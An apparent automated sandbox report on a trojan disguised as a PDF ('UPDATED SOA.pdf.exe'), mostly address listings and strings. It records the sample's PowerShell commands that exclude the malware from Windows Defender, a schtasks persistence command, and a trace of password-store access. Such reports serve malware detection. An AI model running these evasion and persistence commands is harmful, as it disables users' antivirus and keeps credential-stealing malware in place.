                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015620009_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158A3529_2_0158A352
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE3F09_2_014DE3F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015903E69_2_015903E6
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015702749_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015502C09_2_015502C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D05359_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015905919_2_01590591
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015824469_2_01582446
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015744209_2_01574420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157E4F69_2_0157E4F6
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F47509_2_014F4750
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D07709_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CC7C09_2_014CC7C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EC6E09_2_014EC6E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E69629_2_014E6962
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A09_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0159A9A69_2_0159A9A6
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D28409_2_014D2840
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DA8409_2_014DA840
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE8F09_2_014FE8F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B68B89_2_014B68B8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158AB409_2_0158AB40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01586BD79_2_01586BD7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA809_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156CD1F9_2_0156CD1F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DAD009_2_014DAD00
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CADE09_2_014CADE0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E8DBF9_2_014E8DBF
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0C009_2_014D0C00
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0CF29_2_014C0CF2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570CB59_2_01570CB5
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01544F409_2_01544F40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01572F309_2_01572F30
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01512F289_2_01512F28
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F0F309_2_014F0F30
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C2FC89_2_014C2FC8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154EFA09_2_0154EFA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0E599_2_014D0E59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158EE269_2_0158EE26
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158EEDB9_2_0158EEDB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158CE939_2_0158CE93
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2E909_2_014E2E90
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0159B16B9_2_0159B16B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BF1729_2_014BF172
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150516C9_2_0150516C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DB1B09_2_014DB1B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D70C09_2_014D70C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157F0CC9_2_0157F0CC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015870E99_2_015870E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158F0E09_2_0158F0E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BD34C9_2_014BD34C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158132D9_2_0158132D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0151739A9_2_0151739A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EB2C09_2_014EB2C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015712ED9_2_015712ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014ED2F09_2_014ED2F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D52A09_2_014D52A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015875719_2_01587571
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156D5B09_2_0156D5B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C14609_2_014C1460
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158F43F9_2_0158F43F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158F7B09_2_0158F7B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015816CC9_2_015816CC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D99509_2_014D9950
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EB9509_2_014EB950
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015659109_2_01565910
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153D8009_2_0153D800
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D38E09_2_014D38E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158FB769_2_0158FB76
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01545BF09_2_01545BF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150DBF99_2_0150DBF9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EFB809_2_014EFB80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158FA499_2_0158FA49
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01587A469_2_01587A46
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01543A6C9_2_01543A6C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157DAC69_2_0157DAC6
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01515AA09_2_01515AA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01571AA39_2_01571AA3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156DAAC9_2_0156DAAC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01581D5A9_2_01581D5A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D3D409_2_014D3D40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01587D739_2_01587D73
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EFDC09_2_014EFDC0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01549C329_2_01549C32
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158FCF29_2_0158FCF2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158FF099_2_0158FF09
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D1F929_2_014D1F92
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158FFB19_2_0158FFB1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D9EB09_2_014D9EB0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 10_2_015B3E0C10_2_015B3E0C
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 10_2_015B739010_2_015B7390
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0149010013_2_01490100
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014E600013_2_014E6000
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_015202C013_2_015202C0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A053513_2_014A0535
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014C475013_2_014C4750
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A077013_2_014A0770
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0149C7C013_2_0149C7C0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BC6E013_2_014BC6E0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014B696213_2_014B6962
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A29A013_2_014A29A0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014AA84013_2_014AA840
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A284013_2_014A2840
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014CE8F013_2_014CE8F0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014D889013_2_014D8890
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014868B813_2_014868B8
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0149EA8013_2_0149EA80
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014AED7A13_2_014AED7A
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014AAD0013_2_014AAD00
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A8DC013_2_014A8DC0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0149ADE013_2_0149ADE0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014B8DBF13_2_014B8DBF
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A0C0013_2_014A0C00
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01490CF213_2_01490CF2
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01514F4013_2_01514F40
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014E2F2813_2_014E2F28
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014C0F3013_2_014C0F30
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01492FC813_2_01492FC8
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0151EFA013_2_0151EFA0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A0E5913_2_014A0E59
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014B2E9013_2_014B2E90
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014D516C13_2_014D516C
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0148F17213_2_0148F172
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014AB1B013_2_014AB1B0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0148D34C13_2_0148D34C
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A33F313_2_014A33F3
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BB2C013_2_014BB2C0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BD2F013_2_014BD2F0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A52A013_2_014A52A0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0149146013_2_01491460
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014E74E013_2_014E74E0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A349713_2_014A3497
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014AB73013_2_014AB730
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A995013_2_014A9950
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BB95013_2_014BB950
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A599013_2_014A5990
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_0150D80013_2_0150D800
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A38E013_2_014A38E0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01515BF013_2_01515BF0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014DDBF913_2_014DDBF9
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BFB8013_2_014BFB80
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01513A6C13_2_01513A6C
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A3D4013_2_014A3D40
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014BFDC013_2_014BFDC0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_01519C3213_2_01519C32
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014B9C2013_2_014B9C20
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A1F9213_2_014A1F92
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 13_2_014A9EB013_2_014A9EB0
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: String function: 014E7E54 appears 96 times
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: String function: 0150EA12 appears 36 times
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: String function: 01505130 appears 58 times
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: String function: 0153EA12 appears 86 times
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: String function: 01517E54 appears 99 times
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: String function: 0154F290 appears 103 times
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: String function: 014BB970 appears 262 times
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1800997858.0000000004D60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1799640984.00000000044B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1794958354.00000000006BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKUON.exeF vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1796513020.00000000025A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000000.1678956015.0000000000082000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKUON.exeF vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1797902753.0000000003D0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1797902753.00000000034F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000009.00000002.2033978508.00000000015BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.0000000001038000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameexpandj% vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.000000000105B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameexpandj% vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exeBinary or memory string: OriginalFilenameKUON.exeF vs UPDATED SOA.pdf.exe
                Source: UPDATED SOA.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: UPDATED SOA.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: TKgtDXuaZu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, DcEL2LtfcXFUOZVC4R.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, SXVWZtPQtnrRYooVbS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@15/14
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMutant created: \Sessions\1\BaseNamedObjects\ZJKDVVFpAHfCKqz
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCB57.tmpJump to behavior
                Source: UPDATED SOA.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: UPDATED SOA.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: expand.exe, 00000012.00000003.2223734448.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2224507868.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4142996530.00000000009D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: UPDATED SOA.pdf.exeVirustotal: Detection: 29%
                Source: UPDATED SOA.pdf.exeReversingLabs: Detection: 29%
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile read: C:\Users\user\Desktop\UPDATED SOA.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\UPDATED SOA.pdf.exe "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp"
